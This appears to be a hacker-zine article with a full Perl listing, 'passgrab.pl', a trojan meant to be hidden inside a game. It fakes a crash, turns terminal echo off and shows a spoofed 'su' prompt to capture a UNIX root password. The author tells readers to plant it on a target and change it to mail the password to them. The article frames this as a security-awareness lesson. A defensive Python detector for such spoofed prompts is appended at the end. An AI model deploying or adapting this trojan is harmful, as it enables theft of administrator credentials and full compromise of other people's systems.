A Password Grabbing Attempt

by Gr@ve_Rose

First and foremost, I would like to get something out of the way. My Rogers @Home article in 18:4 was not to tell people how to uncap their modems (as so many people e-mailed me about). It was about what I believe hacking to be: Learning. It was something to get you started on your road of learning and teaching others about computers, networks, and security. I hope it helped some people out. Now, on to the real article....

We have all heard about, or even created our own, programs that will rootkit a system. Heck, we're even satisfied if we can get access to a webserver and deface someone's site. The only problem with attacking the computer is that computers are strict. A rule is either true or false, and if your program doesn't meet the criteria, then you don't get access. "What else is there besides attacking the computer?" you ask. Answer: The operator of the computer. Social engineering doesn't have to be over the phone or while you're dressed up like a Bell employee.

Let's examine this a bit: Honestly (for real), how many people out there running UNIX boxes log in as "root" all the time? Do you really log in as "user" and "su" when you need to? Sure, it's good security practice, but human nature is about being lazy, and if it saves typing two letters and a password, then hey, all the better. This is what we're playing upon: The ineptitude, laziness, and lack of security focus of our target operator.

The basis of the program is to hide another program that will e-mail you the operator's "root" password. You will have to know a little programming (or at least understand the syntax of basic programming) and a fair amount of UNIX technical speak. Please keep in mind that this is the first program I have ever created, so you may find an easier way to tweak it. Feel free.

First, modify this program to your liking. Second, create (or get the source code to) another program, like a game (the type of program doesn't matter, but something that your target wouldn't normally look at the source code of). Third, have them run the program.

It seems to me (and all my UNIX friends) that we're getting a bit lax on local security. I run as "root" all the time on my laptop (and my friends log in as "root" on their boxes quite often), which is kind of hypocritical of me. I wrote this article in the hope that people will realize that we, the hacking community, set the standards for UNIX security; we have to stay on top of things and not get lazy. Local security is the most protected form of security and if you've lost it, you've lost all your security.

Shout-outs: Cat5, Deathstroke, Harkonen, CrtklMass, c00k, Storm_Dragon, and, of course, eXoDuS (YNBABWARL!)

#!/usr/bin/perl
#
# by Gr@ve_Rose
# We all know about fancy programs that take over your system
# but what about programs that rely on the ineptitude of 
# the operator? Here is the basic idea:
#
# 1. Start making a program, something small like a game.
# 2. Make it crash. Well, not really, just look like it crashed.
# 3. Pretend that it was a serious crash, serious enough that
#    your 'game' might do bad system things.
# 4. Get them to 'su'.
# 5. One free root password.
#
# Obviously if your 'game' would do something bad, your up-to-date
# system wouldn't let it. But, if the person operating it doesn't know that... :)
#
use strict;

# Get the hostname to make it look like a real "system drop" instead
# of just typing [guest@localhost /]$
chop(my $host = `/bin/hostname`);

#
# FALSE PROGRAM GOES HERE
# 

# Turn the echo off so it seems like they're using 'su'
system ("stty -echo");

# Make it look like the program died while making a system call
# (Feel free to make a 'real' excuse)
print "\n";
print "Error: unhandled system exception at line 10.\n";

# Like this will ever happen, but, hey, it's all about how much your
# victim doesn't know! ;)
print "Dropping you to a guest account for safety. Please 'su' back to root\n";

# Make some apologetic reason that your 'program' died
print "Yeah, this program needs to be fixed. Sorry for the inconvenience.\n";
print "\n";

# One 'real' system prompt calling 'su' coming up....
print "[guest@";
print "$host /]\$ su ";
print "\n";
print "password:";

# Come to daddy
my $command = <STDIN>;

# Change the following lines to mail the password to you
# You'll need to add a few things like full hostname and, hopefully,
# an IP address
system ("clear");
print "\n";
print "Your root password is: $command\n";
print "Thankfully this is just a proof-of-concept program.\n";
print "You may want to be more cautious in the future.\n";
print "\n";
print "Gr\@ve_Rose\n";
print "\n";

# Turn echo back on so we can see what we are typing
system ("stty echo");
passgrab.pl
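
A defender's counterpart to the listing, added here as an example and not part of the original article: a static check that flags scripts which switch terminal echo off, print their own shell prompt running 'su', and then read what is typed. The indicator names, the regexes and both sample scripts are constructed for illustration.

```python
import re

# Indicators modelled on the listing above; the regexes and names are this
# example's own assumptions, not part of the original program.
INDICATORS = {
    "echo_off": re.compile(r"stty\s+-echo"),
    "password_prompt": re.compile(r"(?:print|printf|echo)\b.*pass(?:word|phrase)\s*:", re.I),
    "spoofed_prompt": re.compile(r"(?:print|printf|echo)\b.*[\]\w]\s*\\?[$#]\s+su\b"),
    "reads_stdin": re.compile(r"<STDIN>|\bread\s+-"),
}

def scan(source):
    """Return {indicator: [line numbers]} for every non-comment line that matches."""
    hits = {name: [] for name in INDICATORS}
    for lineno, line in enumerate(source.splitlines(), start=1):
        if line.lstrip().startswith("#"):
            continue  # comments (and the shebang) never reach the terminal
        for name, pattern in INDICATORS.items():
            if pattern.search(line):
                hits[name].append(lineno)
    return hits

def verdict(hits):
    prompts = hits["echo_off"] and hits["password_prompt"]
    # Only a read that follows the prompt can capture what the operator types.
    captured = prompts and any(n > min(hits["password_prompt"]) for n in hits["reads_stdin"])
    if captured and hits["spoofed_prompt"]:
        return "spoofed-su-prompt"  # the script imitates the shell: quarantine it
    if captured:
        return "password-prompt"    # may be legitimate: check where the input goes
    return "clean"

# Constructed samples: SUSPECT has the listing's shape, BENIGN is an ordinary DB prompt.
SUSPECT = r'''#!/usr/bin/perl
system ("stty -echo");
print "[guest\@box /]\$ su \n";
print "password:";
my $typed = <STDIN>;
'''
BENIGN = r'''#!/bin/sh
printf "Database password: "
stty -echo
read -r DBPASS
stty echo
'''

if __name__ == "__main__":
    for label, text in (("SUSPECT", SUSPECT), ("BENIGN", BENIGN)):
        print(label, verdict(scan(text)), scan(text))
```

The benign sample also hides input and asks for a password, so the discriminating indicator is the printed shell prompt: a real 'su' is started by the shell, never announced by the program that just "crashed".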